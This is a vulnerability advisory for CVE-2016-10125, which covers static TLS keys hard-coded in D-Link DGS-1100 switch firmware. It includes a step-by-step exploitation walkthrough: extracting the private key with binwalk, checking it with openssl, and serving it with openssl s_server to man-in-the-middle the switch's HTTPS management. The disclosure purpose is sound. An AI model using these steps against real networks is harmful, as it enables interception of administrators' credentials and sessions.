1. Vulnerability Properties
Title: DLink DGS-1100 switch static hard-coded TLS cryptographic keys in firmware
CVE ID: CVE-2016-10125
CVSSv3 Base Score: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Vendor: DLink (http://www.dlink.com)
Products: DGS-1100 Series Gigabit Smart Managed Switches, RevB (possibly others)
Advisory Release Date: 24 Aug 2016
Advisory URL: https://labs.integrity.pt/advisories/dlink-dgs-1100-hardcoded-keys
Credits: Discovery by Bruno Morisson <bm[at]integrity.pt>
2. Vulnerability Summary
The DGS-1100 16 and 24 port switches (RevB) series firmware contains static, hardcoded cryptographic keys in the firmware. These keys, with the X.509 certificate, are used when HTTPS management is enabled on the switch.
An attacker can recover the private key from the public firmware, and use it perform a Man-In-The-Middle attack on the switch administrator, when he tries to manage the switch through HTTPS.
Since these keys are hardcoded, they cannot be changed.
3. Technical Details
Exploiting the vulnerability
To exploit this vulnerability, the attacker only needs to download the firmware, and extract the private key and the certificate:
$ binwalk DGS1100-fw_1.01.018.flash DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 969166 0xEC9CE Unix path: /../src/kernel/background.c 1238916 0x12E784 Certificate in DER format (x509 v3), header length: 4, sequence length: 685 1239608 0x12EA38 Private key in DER format (PKCS header length: 4, sequence length: 605
After extraction, check certificate:
$ openssl x509 -inform der -in 12E784.crt -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 123 (0x7b)
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=Sample Matrix RSA-1024 Certificate Authority, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
Validity
Not Before: Jan 8 22:58:33 2013 GMT
Not After : Jan 8 22:58:33 2016 GMT
Subject: CN=Sample Matrix RSA-1024 Certificate, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b6:53:c6:8e:1c:30:24:26:7d:c5:0c:96:9a:95:
95:7c:2e:4d:d3:0a:e2:1e:92:82:aa:07:30:ce:71:
c4:2b:d1:45:be:e0:f6:02:98:b1:ad:62:3b:6b:ac:
84:57:9d:c5:e8:b7:3f:c4:bc:b5:2f:48:2a:c8:c8:
84:15:2b:fb:62:30:bc:db:ba:0f:a9:2c:3d:d7:70:
bf:a0:af:86:5e:c6:c4:75:27:e3:7a:e2:7f:d4:da:
90:b6:a7:6c:a5:6e:e3:af:49:1b:4c:e4:5b:23:de:
fa:5d:8b:fc:d8:65:73:ce:ef:86:34:f4:fb:28:3a:
06:e1:ca:74:0c:02:dc:45:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:FALSE
Signature Algorithm: sha1WithRSAEncryption
70:47:b9:b1:40:4a:3c:03:62:ae:1e:a6:44:74:f9:ea:6e:fd:
da:7d:ef:36:42:49:90:13:f9:6f:cb:6f:dc:d7:9c:fa:56:90:
89:9f:3b:87:d8:07:cb:3a:22:19:f6:6c:08:58:77:42:58:50:
ac:f5:f9:ff:1c:df:ab:7c:a1:49:0b:18:5d:b9:47:a0:47:03:
71:9a:9b:dd:d3:cc:8a:bc:b7:77:3c:f1:a9:ff:5f:56:92:4a:
2d:84:9b:21:9e:44:30:5d:39:b9:38:a7:e1:b5:19:51:68:1f:
a8:94:c2:22:d7:94:18:c1:55:78:ca:76:c2:da:7a:49:05:fd:
51:0c
Confirm this is the exact same certificate shown by the browser.
Check the extracted key:
$ openssl rsa -noout -modulus -in 12EA38.key -inform der
Modulus=B653C68E1C3024.....
Run a webserver with this certificate and key:
$ openssl s_server -cert 12E784.crt -certform der -key 12EA38.key -keyform der -accept 443 -HTTP -tls1
An attacker would now be able to perform a man in the middle attack with a correct certificate, even if the administrator had saved this certificate as "trusted".
4. Vulnerable Versions
5. Solution
No solution available. See “6. Workarounds”.
6. Workarounds
Ensure all accesses to the management interface of the switch are performed through a dedicated cable only.
7. Vulnerability Timeline
© 2024 INTEGRITY S.A. All rights reserved. | Cookie Policy